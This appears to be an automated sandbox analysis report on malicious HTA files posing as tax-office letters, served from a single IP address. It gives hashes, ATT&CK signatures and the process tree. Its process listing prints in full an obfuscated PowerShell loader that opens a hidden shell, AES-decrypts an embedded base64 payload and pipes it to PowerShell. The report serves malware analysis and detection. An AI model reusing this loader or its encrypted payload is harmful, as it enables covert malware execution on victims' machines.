Overview
overview
10Static
static
10163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r2.pdf
windows7-x64
3163.5.169....r2.pdf
windows10-2004-x64
3163.5.169....r3.hta
windows7-x64
8163.5.169....r3.hta
windows10-2004-x64
8163.5.169....r3.pdf
windows7-x64
3163.5.169....r3.pdf
windows10-2004-x64
3163.5.169....r4.hta
windows7-x64
8163.5.169....r4.hta
windows10-2004-x64
8163.5.169....r4.pdf
windows7-x64
3163.5.169....r4.pdf
windows10-2004-x64
3163.5.169....r5.hta
windows7-x64
8163.5.169....r5.hta
windows10-2004-x64
8163.5.169....r5.pdf
windows7-x64
3163.5.169....r5.pdf
windows10-2004-x64
3163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....er.hta
windows7-x64
8163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169.28/cmd.exe
windows10-2004-x64
1163.5.169.28/cmt.exe
windows7-x64
3163.5.169.28/cmt.exe
windows10-2004-x64
3163.5.169.28/fd1.exe
windows7-x64
10163.5.169.28/fd1.exe
windows10-2004-x64
10163.5.169....er.hta
windows7-x64
8163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r4.hta
windows7-x64
8Resubmissions
21-01-2025 13:39
250121-qx27kswrck 1021-01-2025 11:57
250121-n4kvrsskfv 1021-01-2025 11:43
250121-nvpglaslfq 1021-01-2025 11:26
250121-njtbea1qcp 10Analysis
-
max time kernel
13s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 11:26
Behavioral task
behavioral1
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
163.5.169.28/ato_letter2.hta
Resource
win7-20240729-en
Behavioral task
behavioral18
Sample
163.5.169.28/ato_letter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
163.5.169.28/atoletter.hta
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
163.5.169.28/atoletter.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
163.5.169.28/atoletter2.hta
Resource
win7-20240729-en
Behavioral task
behavioral22
Sample
163.5.169.28/atoletter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
163.5.169.28/cmd.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
163.5.169.28/cmt.exe
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
163.5.169.28/cmt.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
163.5.169.28/fd1.exe
Resource
win7-20240903-en
Behavioral task
behavioral27
Sample
163.5.169.28/fd1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
163.5.169.28/letter.hta
Resource
win7-20240903-en
Behavioral task
behavioral29
Sample
163.5.169.28/letter.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
163.5.169.28/letter2.hta
Resource
win7-20241010-en
Behavioral task
behavioral31
Sample
163.5.169.28/letter2.hta
Resource
win10v2004-20241007-en
General
-
Target
163.5.169.28/atoletter.hta
-
Size
1.1MB
-
MD5
47b67f1ef2ff1967fd6eee7f2eee2a79
-
SHA1
e53cecf356df43405a19daf75ff5dcfd8b44f2ce
-
SHA256
6c4beabd874f9b38209eb0cc585fc19407edc997ffb0bf0897c34bf4552f5194
-
SHA512
d9586f412e0a9cecc5909cde9391def8c338ca086ba506366076816f6a4ce8309176e884a133bc11bec731bf1d9bf3b027e42ef6a49b545b000ffee60c6d42b9
-
SSDEEP
1536:jxr5/6p/OpbQEcQIKdquZcod/zA4l2ZFmr/l1vcmafSIm+lIWFeQnoxLPCQwkcUC:jxV6JsMEcQIQZcod/c4K
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 572 powershell.exe 2848 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 572 powershell.exe 572 powershell.exe 572 powershell.exe 2968 powershell.exe 2848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 572 powershell.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2384 wrote to memory of 572 2384 mshta.exe 29 PID 2384 wrote to memory of 572 2384 mshta.exe 29 PID 2384 wrote to memory of 572 2384 mshta.exe 29 PID 2384 wrote to memory of 572 2384 mshta.exe 29 PID 572 wrote to memory of 3008 572 powershell.exe 31 PID 572 wrote to memory of 3008 572 powershell.exe 31 PID 572 wrote to memory of 3008 572 powershell.exe 31 PID 572 wrote to memory of 3008 572 powershell.exe 31 PID 3008 wrote to memory of 2848 3008 cmd.exe 33 PID 3008 wrote to memory of 2848 3008 cmd.exe 33 PID 3008 wrote to memory of 2848 3008 cmd.exe 33 PID 3008 wrote to memory of 2848 3008 cmd.exe 33 PID 3008 wrote to memory of 2968 3008 cmd.exe 34 PID 3008 wrote to memory of 2968 3008 cmd.exe 34 PID 3008 wrote to memory of 2968 3008 cmd.exe 34 PID 3008 wrote to memory of 2968 3008 cmd.exe 34
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\atoletter.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa | powershell - }2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa | powershell -3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5ea5333aad398cda68dd1f56c39ed4c22
SHA17ba087ab7a5829d65c4fa75870a97c7d33a465e2
SHA256a6000cd6ebb52820548d6c6b500d2a5a31a60f94872e1a0b10254a60735de5aa
SHA512e9e0e8169851fd0ad507e1e2bc8a92afbe2e18e8f3b0336c67372b2e28d3a54abc67f10c89ca58b643e0374ff31ad9e5fd832c888c0c95c8c916377369d15a15